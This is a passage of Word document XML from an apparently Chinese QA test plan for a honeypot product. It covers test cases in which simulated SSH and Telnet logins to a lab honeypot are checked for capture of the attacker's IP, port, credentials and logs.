                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1896745"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7781DA16" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>主机监控导航栏查看宿主机资源使用情况，如图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B98798C"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13BC0F40" wp14:editId="30A1BEED">
                  <wp:extent cx="4104005" cy="2184400"/>
                  <wp:effectExtent l="0" t="0" r="10795"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92"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2184400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2A319AD8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31FDC6C8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FBFBFE5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>触发glastopf事件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6139A836" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C0E249D"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559F7433" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BF6F7BB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="358" w:name="_Toc36487961"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00536672">
        <w:t>蜜罐网</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00536672">
        <w:t>ssh攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="358"/>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007A2E19" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C8AB226"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7FE14753" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>蜜罐网</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ssh攻击场景测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1BB9E7BC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A471AC5"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44DADF6B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>发起攻击，捕获攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="52535DA1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45FBE54C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B9871D1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>蜜罐功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="532513F9" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="633BC952"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07A734D8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34A30515" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击方式：</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ssh root@192.168.1.194 -p2222</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D06BC76" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>暴露端口：2222</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3678DFCC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>后如下</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>图，可以看到攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="562E625C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4826582C" wp14:editId="0211742B">
                  <wp:extent cx="4104005" cy="1217295"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="190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93"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1217295"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C8047AD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72A24379" wp14:editId="56037F74">
                  <wp:extent cx="4104005" cy="2159635"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="2476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94"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2159635"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="704A9308" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F3D77B4" wp14:editId="54262A2D">
                  <wp:extent cx="4104005" cy="2160905"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="2349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95"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2160905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="77F79C47" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="572CEEDE" wp14:editId="71D4916A">
                  <wp:extent cx="4104005" cy="1345565"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="63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96"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1345565"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="71335217" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58E137C3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6C0AC107" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="507C1305"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42F27F4F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>得到攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0BC6AB29" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="739C26BF"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48875B4E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FA105FB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="359" w:name="_Toc36487962"/>
      <w:r w:rsidRPr="00536672">
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="359"/>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50025FFF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F6F4FF7"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2C5B9225" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="44B1BEA4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06298937"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0281B2B7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>发起攻击，捕获攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="15CBBF24" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71EB8134"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72C8A0BF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>蜜罐功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1F60EB36" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44709661"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2E45D9F6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48C77A39" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击方式：</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>telnet 192.168.1.194 23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27A8BDF7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>暴露端口：23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F8C7DBB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>后如下</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BC02FF9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02DB7663" wp14:editId="38597694">
                  <wp:extent cx="4104005" cy="1242695"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="190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97"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1242695"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="36FD3069" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B26D19A" wp14:editId="7B43D683">
                  <wp:extent cx="4104005" cy="1119505"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="2349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98"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1119505"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A36F487" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
